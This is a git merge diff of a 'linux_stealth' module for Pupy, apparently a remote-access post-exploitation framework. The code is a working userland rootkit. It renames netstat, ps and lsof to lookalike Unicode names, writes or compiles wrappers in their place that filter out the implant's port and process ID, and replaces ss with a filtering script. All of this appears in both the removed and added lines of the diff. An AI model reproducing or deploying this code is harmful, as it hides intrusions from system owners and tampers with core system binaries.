Merge branch 'master' of git://github.com/RedSunEmpire/pupy into RedSunEmpire-master

pupy/modules/linux_stealth.py

@@ -2,30 +2,19 @@
 from pupylib.PupyModule import *
 
 __class_name__="SetStealth"
+def print_callback(data):
+    sys.stdout.write(data)
+    sys.stdout.flush()
 
-@config(cat="manage", compat="unix")
 class SetStealth(PupyModule):
-	"""Hides the runnin process from netstat, ss, ps, lsof by using modified binaries. Be careful when choosing the port.
+    """Hides the runnin process from netstat, ss, ps, lsof by using modified binaries. Be careful when choosing the port.
 Credits to: http://www.jakoblell.com/blog/2014/05/07/hacking-contest-rootkit/
+Demo: https://vimeo.com/157356150"""
+    def init_argparse(self):
+        self.arg_parser = PupyArgumentParser(prog="Linux Stealth Module", description=self.__doc__)
+        self.arg_parser.add_argument('--port', help='The port number to which Pupy is connecting to.')
  
-********************** /!\ WARNING /!\ **********************
+    def run(self, args):
-* Do NOT run the stealh module more than ONCE on a machine. *
+        self.client.load_package("linux_stealth")
-* Running it two times will brake the binaries.			 *
+        self.client.conn.modules['linux_stealth'].run(args.port)
-*************************************************************
+        self.success("Module executed successfully.")
-NOTE: The pp.py script needs to be running with root privileges in order to run this module."""
-	def init_argparse(self):
-		self.arg_parser = PupyArgumentParser(prog="Linux Stealth Module", description=self.__doc__)
-		self.arg_parser.add_argument('port', type=int, help='The port number to which Pupy is connecting to.')
- 
-	def is_compatible(self):
-		a,r=super(SetStealth, self).is_compatible()
-		if not a:
-			return False, r
-		if self.client.conn.modules['subprocess'].check_output(r"ls -l `dirname \`which netstat\``/net*tat | wc -l", shell=True).strip() == "2":
-			return False, "It looks like this module has already been run on this machine."
-		return True, ""
-
-	def run(self, args):
-		self.client.load_package("linux_stealth")
-		self.client.conn.modules['linux_stealth'].run(str(args.port))
-		self.success("Module executed successfully.")

pupy/packages/linux/all/linux_stealth.py

@@ -1,36 +1,41 @@
 #!/usr/bin/env python
 
-import os
+import sys
 import subprocess
+import os
 import time
 
-def cmd_exists(cmd):
-	return subprocess.call("type " + cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) == 0
 
 def run(port):
-    if cmd_exists("gcc") == True:
+    a=subprocess.check_output(["netstat", "-tn"])
-        bash=r"""which netstat ps lsof|perl -pe'$s="\x{455}";$n="\x{578}";chop;$o=$_;s/([ltp])s/\1$s/||s/fin/fi$n/;rename$o,$_;open F,"|gcc -xc - -o$o";print F qq{int main(int a,char**b){char*c[999999]={"sh","-c","$_ \$*|grep -vE \\"""+'"'+port+"""|\$\$|[$s-$n]|grep\\\\""};memcpy(c+3,b,8*a);execv("/bin/sh",c);}}'"""
+    if port in a:
-        #subprocess.call(bash, shell=True)
+        def cmd_exists(cmd):
-        with open('/tmp/b', 'w') as f:
+            return subprocess.call("type " + cmd, shell=True,
-            f.write(bash)
+            stdout=subprocess.PIPE, stderr=subprocess.PIPE) == 0
-        os.system("bash /tmp/b")
+        if cmd_exists("gcc") == True:
-        time.sleep(3)
+            bash=r"""which netstat ps lsof|perl -pe'$s="\x{455}";$n="\x{578}";chop;$o=$_;s/([ltp])s/\1$s/||s/fin/fi$n/;rename$o,$_;open F,"|gcc -xc - -o$o";print F qq{int main(int a,char**b){char*c[999999]={"sh","-c","$_ \$*|grep -vE \\"""+'"'+port+"""|\$\$|[$s-$n]|grep\\\\""};memcpy(c+3,b,8*a);execv("/bin/sh",c);}}'"""
-        os.remove("/tmp/b")
+            with open('/tmp/b', 'w') as f:
-    else:
+                f.write(bash)
-        bash=r"""which netstat ps lsof |perl -pe'$s="\x{455}";$n="\x{578}";chop;$o=$_;s/([ltp])s/\1$s/||s/fin/fi$n/;rename$o,$_;open F,">$o";print F"#!/bin/sh\n$_ \$*|grep -vE \"[$s-$n]|grep|"""+port+"""\\\\"";chmod 493,$o'"""
+                f.close()
-        with open("/tmp/p", "w") as f:
+            os.system("bash /tmp/b")
-            f.write(bash)
+            time.sleep(3)
-        os.system("bash /tmp/p")
+            os.remove("/tmp/b")
-        time.sleep(3)
+        else:
-        os.remove("/tmp/p")
+            bash=r"""which netstat ps lsof |perl -pe'$s="\x{455}";$n="\x{578}";chop;$o=$_;s/([ltp])s/\1$s/||s/fin/fi$n/;rename$o,$_;open F,">$o";print F"#!/bin/sh\n$_ \$*|grep -vE \"[$s-$n]|grep|"""+port+"""\\\\"";chmod 493,$o'"""
-    bashss="""#!/bin/bash
+            with open("/tmp/p", "w") as f:
+                f.write(bash)
+                f.close()
+            os.system("bash /tmp/p")
+            time.sleep(3)
+            os.remove("/tmp/p")
+        bashss="""#!/bin/bash
 /bin/zss $* | grep -v """+port
-    get_ss_path=subprocess.check_output('which ss', shell=True)
+        get_ss_path=subprocess.check_output('which ss', shell=True)
-    path=get_ss_path[:-3]
+        path=get_ss_path[:-3]
-    os.system("mv "+path+"ss "+path+"zss")
+        os.system("mv "+path+"ss "+path+"zss")
-    with open(path+"ss", "w") as newss:
+        with open(path+"ss", "w") as newss:
-        newss.write(bashss)
+            newss.write(bashss)
-    os.system("chmod +x "+path+"ss")
+            newss.close()
-#blazo - fresh orange
+        os.system("chmod +x "+path+"ss")
-#brock - september 22nd
+    else:
-#Creds to: www.jakoblell.com/blog/2014/05/07/hacking-contest-rootkit/
+        pass